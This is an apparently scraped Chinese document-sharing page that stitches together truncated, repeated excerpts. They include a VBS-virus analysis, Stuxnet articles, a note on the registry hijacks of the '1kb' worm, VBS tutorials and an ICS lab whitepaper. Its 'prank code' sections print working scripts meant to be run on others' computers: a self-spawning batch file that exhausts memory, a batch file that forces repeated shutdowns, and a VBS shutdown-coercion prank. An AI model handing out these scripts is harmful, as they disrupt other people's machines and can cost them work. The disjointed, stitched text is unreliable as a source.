VBS脚本病毒分析及防范
VBS脚本病毒分析及防范
摘要:VBScript脚本病毒利用Internet的开放性和各种软件的漏洞对计算机系统进行攻击,常常造成世界范围内的大面积网络瘫痪。VBS脚本病毒呈现出一些新的特点:通过各种网络方式进行传播,传播范围广,破坏性强。
关键词:VBS 脚本病毒防范
一、VBS病毒产生
随着计算机技术的发展.计算机病毒技术亦日益提高。从dos系统到windows 系统.从底层的汇编语言到高层的面向对象语言,无不留其发展的痕迹。尤其是网络的广泛应用。以网络为媒介的病毒技术迅速的发展起来。1998年11月.当一种染毒的VBS文件利用Web页在网络上进行传播的时候,一种全新病毒的概念就诞生了。病毒的制造者们针对微软的窗口操作系统和办公软件。通过E-mail将病毒传播到远程主机上。这种利用VBS脚本语言编写的病毒称之为VBS病毒,VBS 病毒有很多种,较著名的是爱虫病毒和新欢乐时光病毒。
二、VBS病毒的机理
顾名思义,VBS病毒是用VBS cirpt编写而成,该脚本语言功能非常强大。它们利用Windows系统的开放性特点。通过调用一些现成的Windows对象、组件。可以直接对文件系统、注册表等进行控制。功能非常强大。两个最典型的windows 对象就是WSH和FSO。WSH全称“WindowscSripitngHost”。其通用的中文译名为“Windows脚本宿主”。它是内嵌于windows系统中的脚本语言执行环境。此概念在iwndows98系统中提出。类似于DOS下的批处理命令。它架构在ActiveX 之上。充当ActiveX的脚本引擎控制器,为各种脚本语言指令的执行提供了一个公共的基础。任何以js、vbs为后缀名的文件都可以在windows下通过词用Wscript.exe获得执行。FSO全称文件系统对象(FILE SYSTEM OBJECT),该对象模型通过object.method语法,将对文件及文件夹操作通过词用对象本身的属性直接实现。FSO对象模型不仅可以象传统文件操作语句那样实现文件的创建、改变、移动和删除。而且可以检测是否存在指定的文件夹。若存在。可以对它进行定位,并获取有关文件和文件夹的信息。这些以往只能通过调用WindowsAPI函数才能实现的功能为给网络上病毒的入侵提供了一个切入点。
三、传播方式代码分析
VBS脚本病毒之所以传播范围广,主要依赖于它的网络传播功能。VBS脚本病毒主要采用如下四种方式进行传播:通过电子邮件附件传播、通过局域网共享传播、通过感染网页文件传播、通过IRC聊天通道传播等。下面结合具体代6f5对其传播方式逐一进行分析。
1.通过电子邮件附件传播。大部分VBS脚本病毒都可以通过电子邮件附件
世界十大病毒
NO.1 “CIH病毒”爆发年限:1998年6月CIH病毒(1998年)是一位名叫陈盈豪的台湾大学生所编写的,从中国台湾传入大陆地区的。CIH的载体是一个名为“ICQ中文Ch_at模块”的工具,并以热门盗版光盘游戏如“古墓奇兵”或Windows95/98为媒介,经互联网各网站互相转载,使其迅速传播。 CIH病毒属文件型病毒,其别名有Win95.CIH、Spacefiller、 Win32.CIH、PE_CIH,它主要感染Windows95/98下的可执行文件(PE格式,Portable Executable Format),目前的版本不感染DOS以及WIN 3.X(NE格式,Windows and OS/2 Windows 3.1 execution File Format)下的可执行文件,并且在Win NT中无效。其发展过程经历了v1.0,v1.1、v1.2、v1.3、v1.4总共5个版本。 损失估计:全球约5亿美元
NO.2 “梅利莎(Melissa)”爆发年限:1999年3月梅利莎(1999年)是通过微软的Outlook电子邮件软件,向用户通讯簿名单中的50位联系人发送邮件来传播自身。该邮件包含以下这句话:“这就是你请求的文档,不要给别人看”,此外夹带一个Word文档附件。而单击这个文件,就会使病毒感染主机并且重复自我复制。 1999年3月26日,星期五,W97M/梅利莎登上了全球各地报纸的头版。估计数字显示,这个Word宏脚本病毒感染了全球15%~20%的商用PC。病毒传播速度之快令英特尔公司(Intel)、微软公司(Microsoft,下称微软)、以及其他许多使用Outlook软件的公司措手不及,防止损害,他们被迫关闭整个电子邮件系统。 损失估计:全球约3亿——6亿美元
震网病毒的秘密
引子: 看到litdg翻译的《震网的秘密兄弟(一)》,感觉有些地方跟我想象的不一样,所以在litdg兄的基础上就行了更新,我是搞工业自动化的,恰巧阴差阳错的跟信息安全有了些交集,所以以ICS(工业控制系统)的视角,来阐述我对原文的理解。 真正用来破坏伊朗核设施的震网病毒,其复杂程度超出了所有人的预料。 作为第一个被发现的网络攻击武器,震网病毒在被发现后三年来仍然困扰着军事战略家、信息安全专家、政治决策者和广大公众。围绕震网病毒的分析主要有: (1)它是如何攻击位于Natanz的伊朗核设施的? (2)它是如何隐藏自己的? (3)它是如何违背开发者的期望并扩散到Natanz之外的?但是这些分析的主要内容要么是错误的要么是不完整的。 因为,震网病毒并不是一个而是一对。大家的注意力全都关注着震网病毒的“简单功能”,即该功能用来改变铀浓缩的离心机转速,而另外一个被忽视的功能是却是更加的复杂和隐秘的。这一“复杂功能”对于了解ICS(IndustrialControl System的简称)信息安全的人来说
简直是梦魇,奇怪的是“复杂功能”竟然先于“简单功能”出现。“简单功能”在几年后才出现,不久即被发现。 随着伊朗的核计划成为世界舆论的中心,这有利于我们更清晰的了解通过程序来尝试破坏其核计划。震网病毒对于伊朗核计划的真实影响并不确定,因为到底有多少控制器真正的被感染,并不清楚,没有这方面的消息。但是不管怎样,通过深入的分析我们可以知道攻击者的意图、以及如何实现意图。我在过去的三年里对震网病毒进行分析,不但分析其计算机代码,还有被攻击工厂中采用的硬件设备以及核工厂的操作流程。我的发现如下全景图所示,它包含震网病毒的第一个不为人知的变种(“复杂功能”),这一变种需要我们重新评估其攻击。事实上这一变种要比公众所认知的网络武器危险的多。 2007年有人在计算机信息安全网站VirusTotal上提交了一段代码,后来被证实是震网病毒的第一个变种(“复杂功能”),至少是我们已知的第一个。对于第一个震网病毒变种,在五年后(2012)大家基于震网病毒的第二个变种(“简单功能”)的了解基础上,才意识到这是震网病毒。如果没有后来的“简单功能”版本,老的震网病毒(“复杂功能”)可能至今沉睡在反病毒研究者的档案中,并且不会被认定为历史上最具攻击性的病毒之一。 今天,我们已经知道,拥有“复杂功能”的震网病毒包含一个payload,该payload可以严重的干扰位于Natanz的铀浓缩工厂中的离心机保护系统。 后来的震网病毒,被大家熟知的那个“简单功能”版,控制离心机的转速,通过提高其转速而起到破坏离心机的效果。老版本的震网病毒(“复杂功能”)其Payload采用了不同的策略,它用来破坏用于保护离心机的Safe系统。 译者注:工控系统中通常会部署Safe系统,当现场的控制器和执行器出现异常的时候,该Safe系统会运行,紧急停车防止事故发生。而本文论述的震网病毒“复杂功能”版,将Safe系统也攻陷了。震网病毒的“简单功能”版在没有“复杂功能”的配合下是不能够损坏离心机的,因为离心机的转速不正常的情况下,Safe系统就会工作,会停止离心机的运转,这样伊朗的技术人员能够迅速的发现震网病毒。只有Safe系统也被破坏的情况下,震网病毒的“简单功能”才能够随意的控制离心机的转速。当然伊朗的Safe系统与工业现场的传统意义上的Safe系统有所不同,该Safe系统可以说是辅助系统,因为其离心机质量不过关,必须通过该Safe系统保证整体系统的正常运转。工业现场中很重要的一点是连续长时间的稳定运行。 Safe系统通常部署在发生异常的条件下,可能导致设备毁坏或生命财产损失的地方。在Natanz,我们看见一个特殊的安全保护系统,通过它的部署可以使得过时且不可靠的离
vbs经典脚本
Vbs脚本经典教材 Vbs脚本经典教材(最全的资料还是MSDN) —为什么要使用Vbs? 在Windows中,学习计算机操作也许很简单,但是很多计算机工作是重复性劳动,例如你每周也许需要对一些计算机文件进行复制、粘贴、改名、删除,也许你每天启动计算机第一件事情就是打开W ORD,切换到你喜爱的输入法进行文本编辑,同时还要播放优美的音乐给工作创造一个舒心的环境,当然也有可能你经常需要对文本中的某些数据进行整理,把各式各样的数据按照某种规则排列起来……。这些事情重复、琐碎,使人容易疲劳。 第三方软件也许可以强化计算机的某些功能,但是解决这些重复劳动往往事倍功半,我也尝试过使用计算机语言编写程序来解决这些问题,但是随之而来的命令、语法、算法、系统框架和类库常常让我觉得这样是否有必要,难道就是因为猪毛比较难拔,所以我就要去学习机械,为自己设计一个拔猪毛机(?)吗? Vbs是一种Windows脚本,它的全称是:Microsoft Visual Basic Script Editon.(微软公司可视化BASIC脚本版),VBS是Visual Basic的的一个抽象子集,是系统内置的,用它编写的脚本代码不能编译成二进制文件,直接由Windows系统执行(实际是一个叫做宿主host的解释源代码并执行),高效、易学,但是大部分高级语言能干的事情,它基本上都具备,它可以使各种各样的任务自动化,可以使你从重复琐碎的工作中解脱出来,极大的提高工作效率。 我个人认为Vbs脚本其实就是一种计算机编程语言,但是由于缺少计算机程序设计语言中的部分要素,对于事件的描述能力较弱,所以称为脚本,它最方便的地方就是提供了对COM对象的简便支持。那么什么是COM对象呢? 我这样理解,COM对象就是一些具有特定函数功能项程序模块,他们一般以ocx或者dll作为扩展名,你只要找到包含有你需要的功能的模块文件,并在脚本中规范的引用,就可以实现特定的功能,也就是说Vbs脚本就是调用现成的“控件”作为对象,用对象的属性和方法实现目的,完全免去了编写代码、设计算法等等麻烦。说白了,我不是觉得拔猪毛麻烦么?我发觉xx机(比如真空离心器)有一个功能可以实现脱毛,ok,我把它拿来给猪脱毛。什么?大材小用?太浪费资源了?天哪,那是计算机芯片的事情,死道友不死贫道,反正我的事情是方便快速的解决了,这就行了。 最方便的是它甚至不需要专门的开发环境,在你的计算机中,只要有notepad,就可以编写Vbs 脚本了,并且可以直接执行。
Stuxnet病毒驱动分析
Stuxnet蠕虫驱动分析 这里只是分析文字, 贴图影响速度, 就不贴了, 具体看附件pdf文档, 难免有错误之处, 欢迎指正! 一. Stuxnet蠕虫(超级工厂病毒)简单说明 能够利用对windows系统和西门子SIMATIC WinCC系统的7个漏洞进行攻击,被称为是新时代网络战争开始的标志, 也有人宣称是"政府发动的网路战争、带有圣经讯息、最高机密等",呵呵,有点雷人! windows下最主要的传播途径是攻击快捷方式自动执行漏洞(MS10-046), WindowsServer服务的远程溢出漏洞 (MS08-067)以及打印后台程序服务中的远程代码执行漏洞(MS10-061)。 病毒成功攻击了伊朗核电站,造成伊朗核电站推迟发电.由于能够对西门子公司的SIMATIC WinCC监控与数据采集 (SCADA) 系统进行攻击,因此也能攻击我国的钢铁、电力、能源、化工等重要行业, Stuxnet超级工厂病毒直到2010-09-25,才在传入国内网络.我是在近两个月前才收到的,当时只需要简单分析用户态的部分样本,因此没有对驱动进行分析.后来闲着没事时,就分析了驱动部分.不过,此病毒强大之处大部分都在用户态实现. 二.Stuxnet蠕虫(超级工厂病毒)驱动(mrxnet.sys)分析 从Stuxnet蠕虫病毒样本中提取出了两个驱动文件,mrxnet.sys(17k),mrxcls.sys(26k),其中驱动mrxnet.sys在蠕 虫通过u盘驱动器传播时被用来隐藏特定文件,这个驱动是一个文件系统过滤驱动,支持三种文件系统ntfs, fastfat和cdfs文件系统.驱动文件mrxcls.sys则被用于向用户空间中注入代码,被注入的模块被放在一个配 置文件中,这应该就是最初让卡巴斯基头痛的"父进程注入"技术,轻松地绕过卡巴.这里单就只分析驱动
vbs整人代码,表白+提醒两段代码就OK
vbs整人代码,表白+提醒两段代码就OK vbs整人代码,表白+提醒两段代码就OK 一 msgbox "做我女朋友好吗",vbQuestion,"在吗" msgbox ("房产写你名字") msgbox ("保大") msgbox ("我妈会游泳") dim j do while j Select Case msgbox("做我女朋友好吗",68,"请郑重的回答我") Case 6 j=1 Case 7 msgbox("再给你一次机会") end Select loop msgbox("我就知道你会同意的,哈哈哈哈") 使用方法:新建一个txt文档,将上面的代码复制到txt,然后将文档的后缀名改成vbs。鼠标双击即可执行。 二 步骤一:在电脑上新建一个txt文件 步骤二:将以下代码复制过去(中文可以改)const title = “爱情测试”
const yourname = “嫦娥” const question = “你最喜欢的人是谁?请在下面的方框中输入他(她)的名字。” const info = “你在说谎!不要逃避,实话实说。” const scend = “你说出了你的心扉,那就向他(她)表白吧。” dim youranswer do youranswer = inputbox(question, title) if youranswer yourname then msgbox info, vbinformation+vbokonly, title loop until youranswer = yourname msgbox scend, vbinformation+vbokonly, title 步骤三:讲后缀名改为vbs 点击之后效果: 当输入的名字不是代码中的“嫦娥”,则会弹出"你在说谎!不要逃避,实话实说。"当输入“嫦娥”时,则会弹出"你说出了你的心扉,那就向他(她)表白吧。"如果输入的名字不是不是之前代码中写的名字,弹窗就会关不掉,效果是不是很棒,赶紧向心仪的人表白吧。
整人电脑代码
第一个:让别人内存OVER(逼他重启) @echo?off start cmd %0 就这3行了 打开“开始→程序→附件→记事本”,把代码部分复制进去,点“另存为”,路径选“你想要放的地方”,保存类型为“所有文件”,文件名为“你想要的名字.bat”,你的批量处理器就完成了。 第二个:让对方重启指定次数(害人专用) @echo?off if not exist c:1.txt echo. >c:1.txt & goto err1 if not exist c:2.txt echo. >c:2.txt & goto err1 if not exist c:3.txt echo. >c:3.txt & goto err1 if not exist c:4.txt echo. >c:4.txt & goto err1 if not exist c:5.txt echo. >c:5.txt & goto err1 goto err2 :err1 shutdown -s -t 0 :err2 上面可以让对方电脑重启5次后不在重启,当然如果你修改一下加个if not exist c:6.txt echo. >c:6.txt & goto err1那就是重启6次 改成7就是7次...?
打开“开始→程序→附件→记事本”,把代码部分复制进去,点“另存为”,路径选“你想要放的地方”,保存类型为“所有文件”,文件名为“你想要的名字.bat”,你的批量处理器就完成了。 第三个:善意恶搞关机 首先呢,我们在桌面创建个新文件夹然后打开,在上面找到-工具T-文件夹选项O-查看 把隐藏已知文件类型的扩展名前面的勾去掉. 然后我们开始制作.在桌面建立个记事本,然后把下面代码复制进去 on error resume next dim WSHshellA set WSHshellA = wscript.createobject("wscript.shell") WSHshellA.run "cmd.exe /c shutdown -r -t 60 -c ""说我是猪,不说我是猪就一分钟关你机,不信,试试···"" ",0 ,true dim a do while(a <> "我是猪") a = inputbox ("说我是猪,就不关机,快撒,说 ""我是猪"" ","说不说","不说",8000,7000) msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox" loop msgbox chr(13) + chr(13) + chr(13) + "早说就行了嘛" dim WSHshell set WSHshell = wscript.createobject("wscript.shell") WSHshell.run "cmd.exe /c shutdown -a",0 ,true
VBS脚本病毒分析及防范
VBS脚本病毒分析及防范 摘要:VBScript脚本病毒利用Internet的开放性和各种软件的漏洞对计算机系统进行攻击,常常造成世界范围内的大面积网络瘫痪。VBS脚本病毒呈现出一些新的特点:通过各种网络方式进行传播,传播范围广,破坏性强。 关键词:VBS 脚本病毒防范 一、VBS病毒产生 随着计算机技术的发展.计算机病毒技术亦日益提高。从dos系统到windows 系统.从底层的汇编语言到高层的面向对象语言,无不留其发展的痕迹。尤其是网络的广泛应用。以网络为媒介的病毒技术迅速的发展起来。1998年11月.当一种染毒的VBS文件利用Web页在网络上进行传播的时候,一种全新病毒的概念就诞生了。病毒的制造者们针对微软的窗口操作系统和办公软件。通过E-mail将病毒传播到远程主机上。这种利用VBS脚本语言编写的病毒称之为VBS病毒,VBS 病毒有很多种,较著名的是爱虫病毒和新欢乐时光病毒。 二、VBS病毒的机理 顾名思义,VBS病毒是用VBS cirpt编写而成,该脚本语言功能非常强大。它们利用Windows系统的开放性特点。通过调用一些现成的Windows对象、组件。可以直接对文件系统、注册表等进行控制。功能非常强大。两个最典型的windows 对象就是WSH和FSO。WSH全称“WindowscSripitngHost”。其通用的中文译名为“Windows脚本宿主”。它是内嵌于windows系统中的脚本语言执行环境。此概念在iwndows98系统中提出。类似于DOS下的批处理命令。它架构在ActiveX 之上。充当ActiveX的脚本引擎控制器,为各种脚本语言指令的执行提供了一个公共的基础。任何以js、vbs为后缀名的文件都可以在windows下通过词用Wscript.exe获得执行。FSO全称文件系统对象(FILE SYSTEM OBJECT),该对象模型通过object.method语法,将对文件及文件夹操作通过词用对象本身的属性直接实现。FSO对象模型不仅可以象传统文件操作语句那样实现文件的创建、改变、移动和删除。而且可以检测是否存在指定的文件夹。若存在。可以对它进行定位,并获取有关文件和文件夹的信息。这些以往只能通过调用WindowsAPI函数才能实现的功能为给网络上病毒的入侵提供了一个切入点。 三、传播方式代码分析 VBS脚本病毒之所以传播范围广,主要依赖于它的网络传播功能。VBS脚本病毒主要采用如下四种方式进行传播:通过电子邮件附件传播、通过局域网共享传播、通过感染网页文件传播、通过IRC聊天通道传播等。下面结合具体代6f5对其传播方式逐一进行分析。 1.通过电子邮件附件传播。大部分VBS脚本病毒都可以通过电子邮件附件
透视_震网_病毒
收稿时间:2011-07-15 作者简介:李战宝(1964-),男,河南,副研究员,本科,主要研究方向:国外信息安全研究;潘卓(1986-),女,黑龙江,翻译,本科,主要研究方向:国外信息安全研究。 李战宝,潘卓 (1.国家信息技术安全研究中心,北京 100084) 摘 要:2010年伊朗发生的“震网”病毒事件震动全球,成为业界瞩目的热点。文章介绍了“震网” 病毒的关键技术、运行环境、传播方式、特点、危害及防范措施等,并探讨了该事件带来的启示。 关键词:“震网”病毒;数据采集与监视控制系统;工业控制系统 中图分类号:TP393.08 文献标识码:A 文章编号:1671-1122(2011)09-0230-03 The Perspective of Stuxnet Viru LI Zhan-bao, PAN Zhuo ( 1. National Research Center for Information Technology Security, Beijing 100084, China ) Abstract: Last year, the event of Stuxnet virus happened in Iran was a shock to the whole world and it became a hot spot in the industry of the Internet security. This paper introduces the key technology of the Stuxnet virus, its operating environment, its ways and features of infection, as well as its harm and preventive measures. We also explore several inspirations referred to this event to our people, all of this as for reference only. Key words: stuxnet virus; SCADA; ICS doi:10.3969/j.issn.1671-1122.2011.09.070 透视“震网”病毒 1 “震网”病毒震动业界 近期,“震网”病毒(Stuxnet病毒)成为业界热议的焦点之一,信息安全界的许多专家将“震网”病毒攻击伊朗核设施列为2010年十大IT事件之一,并预测类似“震网”病毒的攻击将成为2011年网络破坏行为的重要方式之一,且病毒攻击将更具目的性、精确性和破坏性。 根据著名网络安全公司赛门铁克的研究反映,早在2009年6月,“震网”病毒首例样本就被发现。2010年6月,“震网”病毒开始在全球范围大肆传播,截至2010年9月,已感染超过4.5万网络及相关主机。其中,近60%的感染发生在伊朗,其次为印尼和印度(约30%),美国与巴基斯坦等国家也有少量计算机被感染。数据显示“震网”病毒大约在2009年1月左右就开始大规模感染伊朗国内相关计算机系统。德国GSMK公司专家认为,“震网”病毒对位于伊朗纳坦兹的铀浓缩工厂以及相关设施发起攻击是大概率事件。2010年8月布什尔核电站推迟启动的事件,将“震网”病毒推向前台,并在社会各界迅速升温。2010年11月29日,伊朗总统内贾德公开承认,黑客发起的攻击造成伊朗境内一些浓缩铀设施离心机发生故障。据报道,“震网”病毒可能破坏了伊朗核设施中的1,000台离心机[1]。一位德国计算机高级顾问指出,由于“震网”病毒的侵袭,伊朗的核计划至少拖后了两年[2]。 据悉,2010年7月,我国某知名安全软件公司就监测到了“震网”病毒的出现,并发现该病毒已经入侵我国。该公司反病毒专家警告说,“震网”病毒也有可能在我国企业中的大规模传播。2010年10月3日,中国国家计算机病毒应急处理中心向我国网络用户发出“震网”病毒的安全预警,要求我国能源、交通、水利等部门立即采取措施,加强病毒防范工作。 由于“震网”病毒在伊朗感染的计算机占全球范围的60%,其首要目标就是伊朗的核设施,且技术实现复杂,很多专家推测该病毒发起的攻击很可能是某些国家出于政治目的而操纵实施的。以色列记者罗纳 伯格曼曾撰写《与伊朗的秘密战争》中透露:“如果不是美国和以色列方面早已发动了旨在迟滞伊朗核项目的‘秘密战争’,伊朗的核武研发项目早已实现突破。”书中列举,以色列曾通过欧洲公司向伊朗出售一些工业变电器,通过某种操控,该设备能在瞬间产生数万伏高压电,而在过去几年中,伊朗多处核设施发生供电事故。以色列新闻网站https://www.360docs.net/doc/1113307158.html, 2010年曾引述以色列前内阁成员称,牵制伊朗核计划的唯一可行方法,就是利用计算机恶意软件发动网络攻击。因此,有媒体认为,美国和以色列最有可能是发动该病毒袭击的幕后操纵者。
1kb病毒原理
一个1kb病毒的传播原理: 这种1kb病毒通过AutoRun.inf指向*********.vbs这个脚本文件,来自动运行病毒,感染全部磁盘根目录,这些目录变成快捷方式,这些快捷方式再指向那个vbs文件和相应的文件夹这样双击快捷方式以后就在打开文件夹同时在后台运行了病毒,以后要预防这种病毒就是要禁用系统的自动运行功能。 此毒中招后的一个显著特征是:硬盘各个分区原有的正常文件夹被隐藏,代之以1KB的同名文件夹.lnk文件。误点击这些假冒文件夹后,病毒被激活。这是个.vbs+数据流双料病毒。 一系统设置的更改 1 系统文件关联修改txt,ini,inf,bat,cmd,reg,chm,hlp可能还有其他(当你打开这些文件的时候,相当于执行了一遍病毒) eg: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\batfile\shell\open\ command %SystemRoot%\System32\WScript.exe "C:\WINDOWS\explorer.exe:.vbs" %1 %* 2 我的电脑打开方式被修改(双击我的电脑,同样相当于执行了一遍病毒)
eg: HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-0 8002B30309D}\shell\open\command\ %SystemRoot%\System32\WScript.exe "C:\WINDOWS\explorer.exe:.vbs" OMC HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-0 8002B30309D}\shell\explore\command %SystemRoot%\System32\WScript.exe "C:\WINDOWS\explorer.exe:.vbs" EMC 3 修改IE关联(原来挟持IE主页的方法,被此病毒用来启动自己)eg: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\iexpl ore.exe\shell\open\command %SystemRoot%\System32\WScript.exe "C:\WINDOWS\explorer.exe:.vbs" OIE HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08 002B30309D}\shell\OpenHomePage\Command
几个超有价值的VBS脚本
几个超有价值的VBS脚本! 2008-08-20 12:13 1、exe2swf工具用法:将exe格式的flash拖放在此vbs文件上,即可生成swf文件 dim AsoR,FlashFileName Set ArgObj = WScript.Arguments dim PositionStart,OKed,Tag,EndSize PositionStart = 920000'flash 4的播放器的大致字节数 EndSize = 8 'exe文件结尾字节数,其它版本可以设置为0 FlashFileName = ArgObj(0)'传递路径 set AsoR=CreateObject("Adodb.Stream") AsoR.Mode=3 AsoR.Type=1 AsoR.Open set AsoW=CreateObject("Adodb.Stream") AsoW.Mode=3 AsoW.Type=1 AsoW.Open AsoR.LoadFromFile(FlashFileName) OKed = true dim filesize filesize = AsoR.size if filesize>PositionStart then while OKed AsoR.Position = PositionStart Tag = Bin2Str(AsoR.read(20)) if instr(Tag,"0000000") >0 then PositionStart = PositionStart + 1 else PositionStart = PositionStart + 20 end if if Tag = "00000000000000000708783" or Tag = "00000000000000000678783" then OKed = false end if 'if PositionStart > filesize then ' OKed = false 'end if wend
VBS脚本教程
VBS脚本教程(一) 打开你的“记事本”程序,在编辑窗口填写: msgbox "Hello World!" 然后用鼠标单击“文件”菜单,单击“保存”,把“保存在”一栏设为桌面,在“文件名”一栏中填写kk.vbs,单击“保存”就可以了。然后最小化“记事本”窗口,在桌面上寻找你刚刚保存的kk.vbs,然后双击。看到弹出的对话框了没有,单击“确定”,对话框消失了。难看了点,不过确实是你编写的第一个脚本程序。 说明之一:上面的操作中,保存位置放在桌面,仅仅是为了执行方便,你保存到其他的地方完全没有问题,只要你知道你保存在什么地方就可以了,什么?是废话,自己保存的当然知道保存在那里了。不,自己保存的文件自己找不到的人我见的多了去了。文件名你可以随意填写,不一定非要写kk,只要符合Windows的文件命名规则就可以了,但是扩展名必须是vbs,什么?不知道什么是扩展名?就是文件名中“.”后的那部分,简单说,就是vbs脚本文件命名时必须是:xxx.vbs,其中xxx你随意。 说明之二:在记事本编辑窗口中写的这行是什么意思? Msgbox是VBS内建的函数,每一个函数都可以完成一定的功能,你只需要按照语法要求,在函数的相应部分填写相应的内容就可以了,这部分内容我们称为参数,当然函数执行的结果我们称为返回值,一个函数可以有返回值也可以没有,可以有参数也可以没有。你不用了解函数是怎么运作的,只要了解这个函数能干什么就行了。 Msgbox语法:msgbox "对话框内容", , "对话框的标题" 你不妨用记事本打开刚才的文件在编辑窗口中输入: msgbox "Hello World!" , , "系统提示" 执行一下,看看效果和位置。 说明之三:如果执行失败,看看你的标点符号,所有的标点符号必须是在英文状态下输入的。 当然,这个脚本实在是太简单了,甚至连最简单的交互都没有,所以你可以把脚本这样修改一下: Dim name name=Inputbox("请输入你的名字:","名称") Msgbox name, , "您的名字是" 保存执行一下,看到弹出的对话框了么?填入你的名字,点确定,看到结果了吗? 说明之一:第一句是定义变量,dim是定义变量的语句 其格式为:dim 变量1,变量2……, Vbs只有一种变量类型,所以不用声明变量类型。系统会自动分辨变量类型。 说明之二:inputbox是VBS内建的函数,可以接受输入的内容,其语法格式为: Inputbox("对话框内容","对话框标题") 第二句的意思是接受用户的输入,并把输入结果传递给变量name。 好了,到此脚本基本的输入输出函数都有了,已经可以完成一些比较简单的功能了,你可以编写一个
VBS脚本参考
VBS脚本参考之一——使用连字符2007年06月14日星期四下午08:35前言 这一章的前半部分介绍了VB 脚本最基本的概念,并且告诉你它可以完成的工作,尤其是VBS和其它的如WMI、ADSI 接合在一起的时候。后半部分主要介绍了VBS对系统管理员更有用的部分。 许多脚本和程序语言在向文本输入的时候并不严格的遵守文本的行。例如,尽管下面这个JS 脚本写了很多行,但是,JS 把它当做一行来处理。这是因为,在大部分的时候,JS 只有看到中止符的时候才认为使一个行的中止。在这个例子中,中止符就是“;”。在实际中敲入的行是和脚本本身不相关的。 var 作者:临汾市外事旅游局薛靖澜,转载请注明出处] objWMI =new Enumerator (GetObject("winmgmts:") . InstancesOf("Win32_process")) ; 正好相反,同样的一段代码,用VB 写的时候就会报一个语法错误。 Set objWMI = (GetObject("winmgmts:") . InstancesOf("Win32_process")) 这是因为,VBS用回车键来代替特定的中止符。为了中止一个VB脚本,你不需要来敲入一个分号或者其它的特殊的符号,你只需要敲回车键就好了。一般来讲,不用中止符的限制,使VBS 在编写的过程中变的简单,但是也有一点会有些复杂。为了增强程序的可读性,建
议每行的最大长度不超过80个字符。那么当你的一行代码中有100 个字符,怎么办呢?尽管看来好象有个很简单的解决办法,但是你不能用回车键来将一行代码分隔成很多行。例如如下的代码片断会返回一个VB 运行错误因为它用回车键来分隔脚本 strMessageToDisplay = strUserFirstName, strUserMiddleInitial, strUserLastName, strCurrentStatus Wscript.Echo strMessageToDisplay 你不能用回车建来换行,因为在VB 中它认为回车是代表一段代码的中止,在上面的代码中,它认为第一行是脚本的第一部分陈述内容。然后认为第二行是另外一部分陈述内容。这样因为strCurrentStatus 不是一个VBS的命令,所以就报错了。为了解决这个问题,VB 脚本用下划线来表示下面一行是上面一行的代替。在VB 的早期修订版本中,在第一行末尾加一个空格和一个下划线来表示第二行是第一行的继续。为更明确的表明这个意思,第二行前面要加四个空格。(这样作是为了可读,你其实不必在继续的行前作特定的标识──就是不用在第二行前加四个空格。)作者:临汾市外事旅游局薛靖澜,转载请注明出处] strMessageToDisplay = strUserFirstName, strUserMiddleInitial, strUserLastName, _ strCurrentStatus Wscript.Echo strMessageToDisplay 当继续的行又引号的时候,它就显的特别复杂。例如,架设你用下划线和空格来分隔一个WMI脚本: Set colServiceList = GetObject("winmgmts:").ExecQuery("SELECT * FROM _ Win32_Service WHERE State = 'Stopped' AND StartMode = 'Auto' ") 如果你运行这个脚本,它会弹出一个错误,因为继续换行符放在了引号中间了,这样它就认为换行符是字符串的一部分。为了分隔这个陈述: 1:在第一行用引号中止,然后插入空格和下划线 2:用and(&)符号来开始下一行,这表示第二行是第一行字符串的继续 3:在下一行开始之前加入引号这些引号表示这些陈述是包涵在上面的一行中的,没有了引号,它就VB就解释Win32_Service 是VB 的陈述语句,因为这个语句不是合法的,所以就产生了错误。修正的版本如下: Set colServiceList = GetObject("winmgmts:").ExecQuery("SELECT * FROM " _
华创网安工控安全实验箱白皮书
随着工业4.0、中国制造2025、互联网+、物联网、 两化融合进程的不断交叉融合,越来越多的信息技术应用于工控领域,工业控制系统信息安全正迅速成为新兴战略产业,随之而来的是对于工控网络安全人才的需求的巨大需求,而作为自动化、通信技术、安全技术等交叉的学科类人才的培养,目前尚处在摸索阶段。 ICS 自动化技术 计算机网络 信息安 全技术 工控网络安全所处交叉领域 目前工控网络安全人才市场呈现出人才供需缺口方面、学科交叉不易于培养、学科体系标准缺失教学开展实训缺乏环境等三大类方面的矛盾。华创网安工控安全团队应对于培养高级复合型工业网络安全人才的需求,将产业发展与高等教育深度融合,通过不懈的努力研发了以工控系统网络安全为基础,以物联网安全为导向的工控网络安全移动实验箱,填补了目前行业专业教育的空白,为高校、研究所、教育培训机构、企事业单位开展专业教育提供了有效的攻防实验工具和实
验教程。为迈向工控网络安全专业人才培养的新高度做了新的尝试和探索。 1.0 华创网安便携式工控安全实验箱产品简介 华创网安便携式工控安全实验箱是一款针高校及培训机构教学、科研院所研究、大型企事业单位培训展示的以工控及其工控网络安全为主题设计的移动式平台。该实验箱以精简的自动化系统为基础,很好的融入了华创网安的工控网络安全解决方案。便携式移动实验箱箱集成了主流工业控制器搭建的典型小型控制系统,可模拟典型工业现场环境,并结合华创网安工控网络安全防护解决方案,实现工控网络安全攻防演练功能及展示功能。
工业控制网络安全实验箱 便携式实验箱携带方便、部署简单,并配合丰富的工控网络安全教学课件,可满足工控类及工控安全类人群针对不同的教学及研究要求进行相应的实验。 2.0 实验箱产品的主要特点 移动实验箱集成了典型的小型工业控制系统环境,汇集了华创网安工业控制网络安全防护和审计解决方案,可提供自动化控制系统实验、工控网络攻击实验、工控网络监测和异常行为分析实验、工控网络安全防护实验、工控网络安全事件展示、工控网络典型病毒/木马分析等功能及实验。
C 语言整人代码大全
